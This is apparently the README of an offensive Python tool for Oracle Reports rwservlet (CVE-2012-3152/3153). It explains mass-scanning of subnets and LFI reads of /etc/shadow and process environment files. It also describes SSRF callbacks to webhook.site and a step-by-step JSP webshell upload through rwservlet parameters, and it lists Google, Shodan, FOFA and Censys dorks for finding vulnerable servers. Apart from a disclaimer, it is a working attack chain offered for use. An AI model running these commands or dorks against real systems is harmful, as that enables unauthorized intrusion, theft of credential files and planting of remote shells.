Exploit for CVE-2012-3152 CVE-2012-3152 CVE-2012-3153

## https://sploitus.com/exploit?id=3F90DA9C-C8D3-574C-B1CC-AEF89D90FF98
# Oracle Reports rwservlet Scanner

> ⚠️ **For authorized use only. Only run this tool against systems you own or have explicit written permission to test. Unauthorized use is illegal.**

A focused exploitation scanner for Oracle Reports Server (`rwservlet`) targeting **CVE-2012-3152** and **CVE-2012-3153** — affecting versions below 11g. Automates detection, LFI file reads, SSRF testing, and JSP shell upload across single IPs, CIDR ranges, or target lists. Smart TCP/HTTP pre-filtering skips dead hosts instantly so no time is wasted.

---

## Installation

```bash
git clone https://github.com/abq0/rwsploit.git
cd rwsploit
pip install requests
```

Python 3.8+ required. No other dependencies.

---

## Usage

```bash
python3 rwsploit.py -t  [options]
python3 rwsploit.py -f    [options]
```

Run with no arguments to see the full help menu and recon dorks.

---

## Options

| Flag | Description | Default |
|------|-------------|---------|
| `-t` | Target IP, hostname, or CIDR. Multiple values accepted. | — |
| `-f` | File with one IP or CIDR per line. `#` = comment. | — |
| `-p` | Single custom port — overrides the default port list. | `80 443 8080 7777 7778 7779 8443 9090` |
| `-T` | Concurrent threads. | `15` |
| `-o` | Save LFI dumps to disk with this prefix. e.g. `-o loot` → `loot___.txt` | stdout only |
| `--timeout` | Request timeout in seconds. | `10` |
| `--lfi` | Run LFI file-read payloads. OS is detected first so only relevant payloads run. | off |
| `--no-ssrf` | Skip SSRF webhook test. | off |
| `--shell` | Upload a JSP shell. Prompts for the URL serving your shell content. | off |
| `-h` | Show help and recon dorks. | — |

---

## Examples

```bash
# Detect only
python3 rwsploit.py -t 10.10.10.55 -p 7777

# Detect + LFI
python3 rwsploit.py -t 10.10.10.55 -p 7777 --lfi

# Full chain — LFI + SSRF + shell
python3 rwsploit.py -t 10.10.10.55 -p 7777 --lfi --shell

# Subnet scan, save dumps
python3 rwsploit.py -t 10.10.10.0/24 -p 7777 --lfi -o loot

# From file, no SSRF
python3 rwsploit.py -f targets.txt --lfi --no-ssrf
```

**targets.txt format**
```
# comment — skipped
10.10.10.55
10.10.11.0/24
```

---

## Features

### LFI
Reads world-readable files by detecting the OS first via `showenv`, then running only the matching payload set.

**Linux** — `/etc/passwd`, `/etc/shadow`, `/etc/hosts`, `/etc/issue`, `/etc/os-release`, `/etc/group`, `/etc/crontab`, `/etc/timezone`, `/proc/version`, `/proc/cmdline`, `/proc/self/environ`

**Windows** — `win.ini`, `system32\drivers\etc\hosts`, `boot.ini`, `system.ini`, `AUTOEXEC.BAT`

> 🚨 No LFI output does not mean the target is safe — Oracle's config and file permissions vary. Always test SSRF and shell upload independently.

### SSRF
Fires `rwservlet?JOBTYPE=rwurl&URLPARAMETER=` and polls the [webhook.site](http://webhook.site) API for a callback. Prints the source IP, method, and User-Agent on hit. A fresh webhook token is created automatically at startup.

### Shell Upload (`--shell`)
1. Prompts for the URL serving your JSP shell content
2. Reads `PATH_TRANSLATED` from `showenv` to get the real webroot path
3. Generates a random shell name (e.g. `kxqbrmfa.jsp`)
4. Writes it via: `rwservlet?report=xyzzy&destype=file&desname=&JOBTYPE=rwurl&URLPARAMETER=`
5. Verifies by checking the shell URL for HTTP 200 and prints the live link

---

## Recon Dorks — Oracle Reports < v11

**Google**
```
inurl:"/reports/rwservlet" -site:oracle.com
inurl:"/reports/rwservlet/showenv"
inurl:"/reports/rwservlet/getserverinfo"
intitle:"Oracle Reports Server - Authenticate" inurl:rwservlet
```

**Shodan**
```
http.html:"rwservlet"
http.html:"/reports/rwservlet" http.html:"Oracle"
http.html:"rwservlet/showenv"
http.html:"getserverinfo" http.html:"Oracle Reports"
```

**FOFA**
```
body="/reports/rwservlet"
body="rwservlet" && body="Oracle Reports"
body="/reports/rwservlet/showenv"
body="getserverinfo" && body="rwservlet"
```

**Censys**
```
services.http.response.body: "/reports/rwservlet"
services.http.response.body: "rwservlet" and services.http.response.body: "Oracle Reports"
services.http.response.body: "rwservlet/showenv"
services.http.response.html_title: "Oracle Reports"
```

---

## CVEs

| CVE | Description |
|-----|-------------|
| CVE-2012-3152 | Unauthenticated file read via `rwservlet` `report` parameter |
| CVE-2012-3153 | SSRF and file write via `JOBTYPE=rwurl` + `URLPARAMETER` |

Affects Oracle Reports Server 6i, 9i, 10g — fixed in 11g.

---

## Legal

For authorized penetration testing, CTF challenges, and security research only. The author takes no responsibility for misuse.